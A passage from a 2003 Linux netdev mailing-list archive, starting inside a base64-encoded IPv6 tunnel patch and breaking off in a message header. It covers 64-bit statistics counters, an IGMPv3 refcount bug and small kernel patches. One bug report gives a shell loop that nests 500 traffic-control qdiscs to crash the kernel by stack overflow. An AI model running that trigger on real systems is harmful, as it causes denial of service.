aXY7DQogCQl9DQotCQllcnIgPSBpcDZfdG5sX2Rlc3Ryb3kodCk7DQorCQll cnIgPSB1bnJlZ2lzdGVyX25ldGRldmljZSh0LT5kZXYpOw0KIAkJYnJlYWs7 DQogCWRlZmF1bHQ6DQogCQllcnIgPSAtRUlOVkFMOw0KQEAgLTExMTAsNDAg KzEwNjUsNDkgQEANCiB9DQogDQogLyoqDQotICogaXA2aXA2X3RubF9kZXZf aW5pdF9nZW4gLSBnZW5lcmFsIGluaXRpYWxpemVyIGZvciBhbGwgdHVubmVs IGRldmljZXMNCisgKiBpcDZpcDZfdG5sX2Rldl9zZXR1cCAtIHNldHVwIHZp cnR1YWwgdHVubmVsIGRldmljZQ0KICAqICAgQGRldjogdmlydHVhbCBkZXZp Y2UgYXNzb2NpYXRlZCB3aXRoIHR1bm5lbA0KICAqDQogICogRGVzY3JpcHRp b246DQotICogICBTZXQgZnVuY3Rpb24gcG9pbnRlcnMgYW5kIGluaXRpYWxp emUgdGhlICZzdHJ1Y3QgZmxvd2kgdGVtcGxhdGUgdXNlZA0KLSAqICAgYnkg dGhlIHR1bm5lbC4NCisgKiAgIEluaXRpYWxpemUgZnVuY3Rpb24gcG9pbnRl cnMgYW5kIGRldmljZSBwYXJhbWV0ZXJzDQogICoqLw0KIA0KLXN0YXRpYyB2 b2lkDQotaXA2aXA2X3RubF9kZXZfaW5pdF9nZW4oc3RydWN0IG5ldF9kZXZp Y2UgKmRldikNCitzdGF0aWMgdm9pZCBpcDZpcDZfdG5sX2Rldl9zZXR1cChz dHJ1Y3QgbmV0X2RldmljZSAqZGV2KQ0KIHsNCi0Jc3RydWN0IGlwNl90bmwg KnQgPSAoc3RydWN0IGlwNl90bmwgKikgZGV2LT5wcml2Ow0KLQlzdHJ1Y3Qg Zmxvd2kgKmZsID0gJnQtPmZsOw0KLQ0KLQltZW1zZXQoZmwsIDAsIHNpemVv ZiAoKmZsKSk7DQotCWZsLT5wcm90byA9IElQUFJPVE9fSVBWNjsNCi0NCi0J ZGV2LT5kZXN0cnVjdG9yID0gaXA2aXA2X3RubF9kZXZfZGVzdHJ1Y3RvcjsN CisJU0VUX01PRFVMRV9PV05FUihkZXYpOw0KIAlkZXYtPnVuaW5pdCA9IGlw NmlwNl90bmxfZGV2X3VuaW5pdDsNCisJZGV2LT5kZXN0cnVjdG9yID0gKHZv aWQgKCopKHN0cnVjdCBuZXRfZGV2aWNlICopKWtmcmVlOw0KIAlkZXYtPmhh cmRfc3RhcnRfeG1pdCA9IGlwNmlwNl90bmxfeG1pdDsNCiAJZGV2LT5nZXRf c3RhdHMgPSBpcDZpcDZfdG5sX2dldF9zdGF0czsNCiAJZGV2LT5kb19pb2N0 bCA9IGlwNmlwNl90bmxfaW9jdGw7DQogCWRldi0+Y2hhbmdlX210dSA9IGlw NmlwNl90bmxfY2hhbmdlX210dTsNCisNCiAJZGV2LT50eXBlID0gQVJQSFJE X1RVTk5FTDY7DQorCWRldi0+aGFyZF9oZWFkZXJfbGVuID0gTExfTUFYX0hF QURFUiArIHNpemVvZiAoc3RydWN0IGlwdjZoZHIpOw0KKwlkZXYtPm10dSA9 IEVUSF9EQVRBX0xFTiAtIHNpemVvZiAoc3RydWN0IGlwdjZoZHIpOw0KIAlk ZXYtPmZsYWdzIHw9IElGRl9OT0FSUDsNCi0JaWYgKGlwdjZfYWRkcl90eXBl KCZ0LT5wYXJtcy5yYWRkcikgJiBJUFY2X0FERFJfVU5JQ0FTVCAmJg0KLQkg ICAgaXB2Nl9hZGRyX3R5cGUoJnQtPnBhcm1zLmxhZGRyKSAmIElQVjZfQURE Ul9VTklDQVNUKQ0KLQkJZGV2LT5mbGFncyB8PSBJRkZfUE9JTlRPUE9JTlQ7 DQotCS8qIEhtbS4uLiBNQVhfQUREUl9MRU4gaXMgOCwgc28gdGhlIGlwdjYg YWRkcmVzc2VzIGNhbid0IGJlIA0KKwlkZXYtPmlmbGluayA9IDA7DQorCS8q IEhtbS4uLiBNQVhfQUREUl9MRU4gaXMgOCwgc28gdGhlIGlwdjYgYWRkcmVz c2VzIGNhbid0IGJlDQogCSAgIGNvcGllZCB0byBkZXYtPmRldl9hZGRyIGFu ZCBkZXYtPmJyb2FkY2FzdCwgbGlrZSB0aGUgaXB2NA0KIAkgICBhZGRyZXNz ZXMgd2VyZSBpbiBpcGlwLmMsIGlwX2dyZS5jIGFuZCBzaXQuYy4gKi8NCiAJ ZGV2LT5hZGRyX2xlbiA9IDA7DQogfQ0KIA0KKw0KKy8qKg0KKyAqIGlwNmlw Nl90bmxfZGV2X2luaXRfZ2VuIC0gZ2VuZXJhbCBpbml0aWFsaXplciBmb3Ig YWxsIHR1bm5lbCBkZXZpY2VzDQorICogICBAZGV2OiB2aXJ0dWFsIGRldmlj ZSBhc3NvY2lhdGVkIHdpdGggdHVubmVsDQorICoqLw0KKw0KK3N0YXRpYyBp bmxpbmUgdm9pZA0KK2lwNmlwNl90bmxfZGV2X2luaXRfZ2VuKHN0cnVjdCBu ZXRfZGV2aWNlICpkZXYpDQorew0KKwlzdHJ1Y3QgaXA2X3RubCAqdCA9IChz dHJ1Y3QgaXA2X3RubCAqKSBkZXYtPnByaXY7DQorCXQtPmZsLnByb3RvID0g SVBQUk9UT19JUFY2Ow0KKwl0LT5kZXYgPSBkZXY7DQorCXN0cmNweSh0LT5w YXJtcy5uYW1lLCBkZXYtPm5hbWUpOw0KK30NCisNCiAvKioNCiAgKiBpcDZp cDZfdG5sX2Rldl9pbml0IC0gaW5pdGlhbGl6ZXIgZm9yIGFsbCBub24gZmFs bGJhY2sgdHVubmVsIGRldmljZXMNCiAgKiAgIEBkZXY6IHZpcnR1YWwgZGV2 aWNlIGFzc29jaWF0ZWQgd2l0aCB0dW5uZWwNCkBAIC0xMTY3LDggKzExMzEs MTAgQEANCiANCiBpbnQgaXA2aXA2X2ZiX3RubF9kZXZfaW5pdChzdHJ1Y3Qg bmV0X2RldmljZSAqZGV2KQ0KIHsNCi0JaXA2aXA2X3RubF9kZXZfaW5pdF9n ZW4oZGV2KTsNCi0JdG5sc193Y1swXSA9ICZpcDZpcDZfZmJfdG5sOw0KKwlz dHJ1Y3QgaXA2X3RubCAqdCA9IGRldi0+cHJpdjsNCisJaXA2aXA2X3RubF9k ZXZfaW5pdF9nZW4oZGV2KTsgDQorCWRldl9ob2xkKGRldik7DQorCXRubHNf d2NbMF0gPSB0Ow0KIAlyZXR1cm4gMDsNCiB9DQogDQpAQCAtMTE5MCw4ICsx MTU2LDYgQEANCiAJc3RydWN0IHNvY2sgKnNrOw0KIAlzdHJ1Y3QgaXB2Nl9w aW5mbyAqbnA7DQogDQotCWlwNmlwNl9mYl90bmxfZGV2LnByaXYgPSAodm9p ZCAqKSAmaXA2aXA2X2ZiX3RubDsNCi0NCiAJZm9yIChpID0gMDsgaSA8IE5S X0NQVVM7IGkrKykgew0KIAkJaWYgKCFjcHVfcG9zc2libGUoaSkpDQogCQkJ Y29udGludWU7DQpAQCAtMTIxOSwxMCArMTE4MywyMyBAQA0KIAkJZ290byBm YWlsOw0KIAl9DQogDQotCVNFVF9NT0RVTEVfT1dORVIoJmlwNmlwNl9mYl90 bmxfZGV2KTsNCi0JcmVnaXN0ZXJfbmV0ZGV2KCZpcDZpcDZfZmJfdG5sX2Rl dik7DQotDQorCQ0KKwlpcDZpcDZfZmJfdG5sX2RldiA9IGFsbG9jX25ldGRl dihzaXplb2Yoc3RydWN0IGlwNl90bmwpLCAiaXA2dG5sMCIsDQorCQkJCQkg aXA2aXA2X3RubF9kZXZfc2V0dXApOw0KKw0KKwlpZiAoIWlwNmlwNl9mYl90 bmxfZGV2KSB7DQorCQllcnIgPSAtRU5PTUVNOw0KKwkJZ290byB0bmxfZmFp bDsNCisJfQ0KKwlpcDZpcDZfZmJfdG5sX2Rldi0+aW5pdCA9IGlwNmlwNl9m Yl90bmxfZGV2X2luaXQ7DQorDQorCWlmICgoZXJyID0gcmVnaXN0ZXJfbmV0 ZGV2KGlwNmlwNl9mYl90bmxfZGV2KSkpIHsNCisJCWtmcmVlKGlwNmlwNl9m Yl90bmxfZGV2KTsNCisJCWdvdG8gdG5sX2ZhaWw7DQorCX0NCiAJcmV0dXJu IDA7DQordG5sX2ZhaWw6DQorCWluZXQ2X2RlbF9wcm90b2NvbCgmaXA2aXA2 X3Byb3RvY29sLCBJUFBST1RPX0lQVjYpOw0KIGZhaWw6DQogCWZvciAoaiA9 IDA7IGogPCBpOyBqKyspIHsNCiAJCWlmICghY3B1X3Bvc3NpYmxlKGopKQ0K QEAgLTEyNDEsNyArMTIxOCw3IEBADQogew0KIAlpbnQgaTsNCiANCi0JdW5y ZWdpc3Rlcl9uZXRkZXYoJmlwNmlwNl9mYl90bmxfZGV2KTsNCisJdW5yZWdp c3Rlcl9uZXRkZXYoaXA2aXA2X2ZiX3RubF9kZXYpOw0KIA0KIAlpbmV0Nl9k ZWxfcHJvdG9jb2woJmlwNmlwNl9wcm90b2NvbCwgSVBQUk9UT19JUFY2KTsN CiANCg== ---377318441-1068751107-1057349978=:16323-- From jeffpc@optonline.net Fri Jul 4 18:48:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 04 Jul 2003 18:48:32 -0700 (PDT) Received: from mta10.srv.hcvlny.cv.net (mta10.srv.hcvlny.cv.net [167.206.5.45]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h651mP2x016260 for ; Fri, 4 Jul 2003 18:48:26 -0700 Received: from asv13.srv.hcvlny.cv.net (asv13.srv.hcvlny.cv.net [167.206.5.147]) by mta10.srv.hcvlny.cv.net (iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)) with ESMTP id <0HHI00FWKHW7LK@mta10.srv.hcvlny.cv.net> for netdev@oss.sgi.com; Fri, 04 Jul 2003 13:57:44 -0400 (EDT) Received: from jeff.home (ool-44c2049f.dyn.optonline.net [68.194.4.159]) by asv13.srv.hcvlny.cv.net (8.12.9/8.12.9) with ESMTP id h64HuatX016667; Fri, 04 Jul 2003 13:56:39 -0400 (EDT) Date: Fri, 04 Jul 2003 13:57:19 -0400 From: Jeff Sipek Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net In-reply-to: <20030704094745.GG29233@lug-owl.de> To: Jan-Benedict Glaw , Kernel Mailing List Cc: Andrew Morton , Dave Jones , Jeff Garzik , netdev@oss.sgi.com, Linus Torvalds Message-id: <200307041357.32871.jeffpc@optonline.net> MIME-version: 1.0 Content-type: Text/Plain; charset=iso-8859-1 Content-transfer-encoding: 7BIT Content-disposition: inline Content-description: clearsigned data User-Agent: KMail/1.5.2 References: <200307032231.39842.jeffpc@optonline.net> <20030704094745.GG29233@lug-owl.de> X-archive-position: 3763 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jeffpc@optonline.net Precedence: bulk X-list: netdev -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Friday 04 July 2003 05:47, Jan-Benedict Glaw wrote: > Well... I don't really like to break userspace, but why don't we simply > make packet/traffic counters long long / u_int64_t? This way, we'd > simply keep almost all drivers untouched and only need to fiddle with > some sprints()/printk() statements? I'm no hardware expert, however, that approach contains potential race condition - not a system critical one, but something we should be concerned about. If one cpu tries to read a u_int64_t variable while another tries to update it, the worst case scenario is that the reader will get the high 32-bits before the write, and low 32-bit after the write, now if the counter overflow, the number would be off by 4GB! (This only applies to 32-bit architectures.) True, there are cache coherency algorithms, etc... > Really, how many programs use the current statistics? I'd prefer to > modify them over adding strange patches like this one to the kernel... I believe that on any kind of router some at some point in time would like to know the data transfered. Jeff. - -- Keyboard not found! Press F1 to enter Setup -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE/BcADwFP0+seVj/4RAq2TAKDS0oAnj0/PrCuPoxdQF0euBiy6LACeMHqk gWJhwub4y0VtQmC/hcevJB4= =RCSe -----END PGP SIGNATURE----- From chas@locutus.cmf.nrl.navy.mil Fri Jul 4 19:19:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 04 Jul 2003 19:19:18 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h652JB2x016567 for ; Fri, 4 Jul 2003 19:19:12 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h652J7sG025618 for ; Fri, 4 Jul 2003 22:19:07 -0400 (EDT) Message-Id: <200307050219.h652J7sG025618@ginger.cmf.nrl.navy.mil> To: netdev@oss.sgi.com Subject: igmp3 and igmp_group_dropped() trouble? Reply-To: chas3@users.sourceforge.net Date: Fri, 04 Jul 2003 22:16:50 -0400 From: chas williams X-Spam-Score: (**) hits=2.5 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 3764 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev recently i noticed a little problem with my lane interfaces not being unregistered completely when i rmmod'ed the module -- it would stick with a single outstanding reference to the network device. also, if i kept ifup'ing/ifdown'ing, eventually i would get an oops in kernel/timer.c:377. i have tracked this down to a problem with igmp_group_dropped() and the newish (to me anyway) igmp3 support. during ip_mc_down(), seems like its trying to stop all the timers and drop any refs that a timer might have to the inet device: in_dev->mr_ifc_count = 0; if (del_timer(&in_dev->mr_ifc_timer)) __in_dev_put(in_dev); then it goes on to delete the multicast groups: for (i=in_dev->mc_list; i; i=i->next) igmp_group_dropped(i); unfortunately igmp_group_dropped() seems to schedule the mr_ifc_timer (via igmp_ifc_event) in an effort to inform the network its no longer a member of the group (or so i think). this isnt a particular problem, except that the timers use __in_dev_put(), so if the timer is the last guy to dec the refcnt on inet device, the inet destroy function is never called and inet never drops its last reference to to the network interface. i am guessing that ip_mc_down() is supposed to get the igmp stack to drop all references to the inet device. some possible solutions (assuming the above is correct): in igmp_group_dropped() dont bother trying to send drop messages if !IFF_UP. in ip_mc_down(), delete the mr_ifc_timer AFTER dropping the group membership. i guess i would learn toward this one. however, you might also need delete the timer again in ip_mc_destroy_dev() since it also calls igmp_group_dropped() after its too late to send anything to the network. From jmorris@intercode.com.au Sat Jul 5 10:58:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 10:58:34 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:zklLyXdkVtQeqBRWV7vlAaoO+PS3w/oO@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65HwS2x029318 for ; Sat, 5 Jul 2003 10:58:30 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h65Hvur30414; Sun, 6 Jul 2003 03:57:57 +1000 Date: Sun, 6 Jul 2003 03:57:55 +1000 (EST) From: James Morris To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: davem@redhat.com, , , Subject: Re: [PATCH] ATM: CLIP: C99 initializers In-Reply-To: <20030703.183850.78164037.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3770 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Thu, 3 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > This converts nlip_tbl to C99 initializers. > (and fixes wrong value for proxy_len and locktime.) Heh, nice catch. Applied to bk://kernel.bkbits.net/jmorris/net-2.5 - James -- James Morris From jmorris@intercode.com.au Sat Jul 5 11:11:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 11:11:36 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:qbv7G6atDeF37mJ5F/sn6KcyBRyLcryE@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65IBO2x029729 for ; Sat, 5 Jul 2003 11:11:26 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h65IBLr30679; Sun, 6 Jul 2003 04:11:21 +1000 Date: Sun, 6 Jul 2003 04:11:20 +1000 (EST) From: James Morris To: netdev@oss.sgi.com cc: lode leroy Subject: [PATCH] 2.5.70 - display bootserver in /proc/net/pnp (net/ipv4/ipconfig.c) (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3771 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev Forwarded to netdev for comment. ---------- Forwarded message ---------- Date: Fri, 04 Jul 2003 11:43:38 +0200 From: lode leroy To: linux-kernel@vger.kernel.org Cc: mj@atrey.karlin.mff.cuni.cz Subject: [PATCH] 2.5.70 - display bootserver in /proc/net/pnp (net/ipv4/ipconfig.c) Hello, I would like to submit a trivial enhancement to display the ip address of the bootserver in /proc/net/pnp This aids me in developing a diskless linux root image to know where it comes from... please kindly apply this to the current linux 2.7.x tree -- lode # diff -u net/ipv4/ipconfig.{orig,c} --- net/ipv4/ipconfig.orig 2003-05-27 03:00:21.000000000 +0200 +++ net/ipv4/ipconfig.c 2003-07-04 11:17:30.000000000 +0200 @@ -1115,6 +1115,9 @@ "nameserver %u.%u.%u.%u\n", NIPQUAD(ic_nameservers[i])); } + len += sprintf(buffer + len, + "bootserver %u.%u.%u.%u\n", + NIPQUAD(ic_servaddr)); if (offset > len) offset = len; _________________________________________________________________ Receive your Hotmail & Messenger messages on your mobile phone with MSN Mobile http://www.msn.be/gsm/smsservices - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/ From jgarzik@pobox.com Sat Jul 5 13:41:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 13:41:11 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65Kf32x031253 for ; Sat, 5 Jul 2003 13:41:04 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19Ytq8-0002Ji-GT; Sat, 05 Jul 2003 21:41:00 +0100 Message-ID: <3F0737D1.5090109@pobox.com> Date: Sat, 05 Jul 2003 16:40:49 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Jeff Sipek CC: Bernd Eckenfels , linux-kernel@vger.kernel.org, Andrew Morton , Dave Jones , Linus Torvalds , netdev@oss.sgi.com Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net References: <200307051637.52252.jeffpc@optonline.net> In-Reply-To: <200307051637.52252.jeffpc@optonline.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3775 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev The net stats are already unsigned long internally. 64-bit case is handled quite nicely today, thanks :) I'm such a 64-bit bigot that "buy a 64-bit computer" is a solution I commonly suggest, and it seems to fit well here, too. Jeff, wondering if Intel will bother to compete w/ Athlon64 From jeffpc@optonline.net Sat Jul 5 13:53:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 13:53:19 -0700 (PDT) Received: from mta2.srv.hcvlny.cv.net (mta2.srv.hcvlny.cv.net [167.206.5.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65KrE2x031532 for ; Sat, 5 Jul 2003 13:53:15 -0700 Received: from asv19.srv.hcvlny.cv.net (asv19.srv.hcvlny.cv.net [167.206.5.173]) by mta2.srv.hcvlny.cv.net (iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)) with ESMTP id <0HHK00K63JZ9MF@mta2.srv.hcvlny.cv.net> for netdev@oss.sgi.com; Sat, 05 Jul 2003 16:37:57 -0400 (EDT) Received: from jeff.home (ool-44c2049f.dyn.optonline.net [68.194.4.159]) by asv19.srv.hcvlny.cv.net (8.12.9/8.12.9) with ESMTP id h65KaujJ009847; Sat, 05 Jul 2003 16:36:57 -0400 (EDT) Date: Sat, 05 Jul 2003 16:37:43 -0400 From: Jeff Sipek Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net In-reply-to: To: Bernd Eckenfels , linux-kernel@vger.kernel.org Cc: Andrew Morton , Dave Jones , Linus Torvalds , netdev@oss.sgi.com, Jeff Garzik Message-id: <200307051637.52252.jeffpc@optonline.net> MIME-version: 1.0 Content-type: Text/Plain; charset=iso-8859-1 Content-transfer-encoding: 7BIT Content-disposition: inline Content-description: clearsigned data User-Agent: KMail/1.5.2 References: X-archive-position: 3776 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jeffpc@optonline.net Precedence: bulk X-list: netdev -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Saturday 05 July 2003 15:58, Bernd Eckenfels wrote: > a reader like ifconfig can easyly work around this with multiple tries, but > incremeting those variables wont work that easy, and therefore needs a > lock, which will be a major pita. > > 64bit counters should be a result of lockless per-cpu network counters > (32bit) with some kind of async merging. This is going to make the structure huge - not only you have the 32-bit variables for every CPU, but you have one global set of 64-bit variables (possibly you will need a lock for the 64-bit vars.) Also another thing to consider is portability across architectures - we don't need all this code on 64-bit arches. On the other hand, per-cpu stats may possibly make up for the extra code - no cache bouncing, etc. > Or we wait till 64bit hardware is more common :) Hehe, the thing is, that when 64bits beecome more common you will have this huge number of unused x86 computers that people will: - - throw out - - donate - - convert to all sorts of "embedded" systems which need stable OS (read: Linux) (these include routers) So, x86 is here to stay for some time. Jeff. - -- The Moon is Waxing Crescent (36% of Full) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE/BzcbwFP0+seVj/4RAuMHAJ9sN0E4OgsPeM09D6hbgM3boECLDwCbBDTP 6u8SSobW0+Y0oWq3H4koHd0= =Z89A -----END PGP SIGNATURE----- From greearb@candelatech.com Sat Jul 5 14:46:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 14:46:57 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65Lkn2x032090 for ; Sat, 5 Jul 2003 14:46:52 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h65LkXKk002853; Sat, 5 Jul 2003 14:46:33 -0700 Message-ID: <3F074739.9090006@candelatech.com> Date: Sat, 05 Jul 2003 14:46:33 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jeff Sipek CC: Linus Torvalds , Kernel Mailing List , Andrew Morton , Dave Jones , Jeff Garzik , netdev@oss.sgi.com Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net References: <200307051449.32934.jeffpc@optonline.net> In-Reply-To: <200307051449.32934.jeffpc@optonline.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3779 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Jeff Sipek wrote: > Using KB would give us additional 10 bits (making the overflow at 4 TB.) I > don't really like the idea of using MB, but the underlying idea is the same - > 20 more bits, making the limit 4 PB. > > What is the consensus on this way of solving the problem? I guess it could be useful for something like ifconfig, but serious applications will need more precision and should deal with wraps anyway (even on 64-bits, in my opinion..why have to fix bugs in 10 years because we were too lazy to take the 10 minutes to make it right now). Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From creatix@hipac.org Sat Jul 5 15:29:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 15:29:09 -0700 (PDT) Received: from smtprelay02.ispgateway.de (smtprelay02.ispgateway.de [62.67.200.157]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65MT02x032496 for ; Sat, 5 Jul 2003 15:29:01 -0700 Received: (qmail 11005 invoked from network); 5 Jul 2003 22:22:19 -0000 Received: from unknown (HELO portal.lan) (134300@[80.138.229.66]) (envelope-sender ) by smtprelay02.ispgateway.de (qmail-ldap-1.03) with SMTP for ; 5 Jul 2003 22:22:19 -0000 Received: from hipac.org (tmobile.lan [192.168.0.6]) by portal.lan (Postfix) with ESMTP id 16A084B07E; Sat, 5 Jul 2003 22:54:42 +0200 (CEST) Message-ID: <3F074F74.2090308@hipac.org> Date: Sun, 06 Jul 2003 00:21:40 +0200 From: Thomas Heinz Reply-To: Thomas Heinz User-Agent: Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.0.0) Gecko/20020623 Debian/1.0.0-0.woody.1 X-Accept-Language: de, en MIME-Version: 1.0 To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: tc stack overflow Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3780 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: creatix@hipac.org Precedence: bulk X-list: netdev Hi Have you already crashed your kernel today? No? Well, try this one: # tc qdisc add dev eth0 root handle 1: prio \ for i in `seq 500` ; do tc qdisc add dev eth0 \ parent $i:1 handle `expr $i + 1`: prio ; done ; \ ping 1.2.3.4 [replace eth0 by a device of your choice] I think some of you are aware of the problem but strangely I didn't find any mention on linux-kernel or linux-netdev or lartc. The problem is that the depth of the classification tree is not limited in any way and since for every qdisc the corresponding enqueue function is called we have a stack overflow here. IMO the problem could be fixed by adding a depth parameter to the enqueue function. This way the function can decide whether it is save to go deeper down the tree (maybe subject to a global policy). So, what do you think about the issue? Do you care? Regards, Thomas From romieu@fr.zoreil.com Sat Jul 5 15:55:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 15:55:33 -0700 (PDT) Received: from fr.zoreil.com (electric-eye.fr.zoreil.com [213.41.134.224]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65MtQ2x000342 for ; Sat, 5 Jul 2003 15:55:27 -0700 Received: from electric-eye.fr.zoreil.com (localhost.localdomain [127.0.0.1]) by fr.zoreil.com (8.12.8/8.12.1) with ESMTP id h65LpWfI010947; Sat, 5 Jul 2003 23:51:32 +0200 Received: (from romieu@localhost) by electric-eye.fr.zoreil.com (8.12.8/8.12.1) id h65LpVDx010946; Sat, 5 Jul 2003 23:51:31 +0200 Date: Sat, 5 Jul 2003 23:51:31 +0200 From: Francois Romieu To: Jeff Sipek Cc: Jeff Garzik , Bernd Eckenfels , linux-kernel@vger.kernel.org, Andrew Morton , Dave Jones , Linus Torvalds , netdev@oss.sgi.com Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net Message-ID: <20030705235131.A10511@electric-eye.fr.zoreil.com> References: <200307051637.52252.jeffpc@optonline.net> <3F0737D1.5090109@pobox.com> <200307051700.32533.jeffpc@optonline.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200307051700.32533.jeffpc@optonline.net>; from jeffpc@optonline.net on Sat, Jul 05, 2003 at 04:59:05PM -0400 X-archive-position: 3782 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: romieu@fr.zoreil.com Precedence: bulk X-list: netdev Jeff Sipek : [network counter overflow on 32 bits systems] > The thing is that x86 is here to stay for quite some time. Even if 64-bit > processors take over the market, you will have so many "old" computers that > can: > > - - be thrown out > - - donated to some institution > - - converted to routers, and other "embedded" systems > > Plus, they will be dirt cheap. - the PCI bus don't/won't/can't handle multiple 10 Gb/s adapters; - nobody sane would recycle x86 systems as core routers after having bought a few Gb/s link. -- Ueimor From greearb@candelatech.com Sat Jul 5 16:36:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 16:36:28 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65NaK2x001026 for ; Sat, 5 Jul 2003 16:36:20 -0700 Received: from candelatech.com 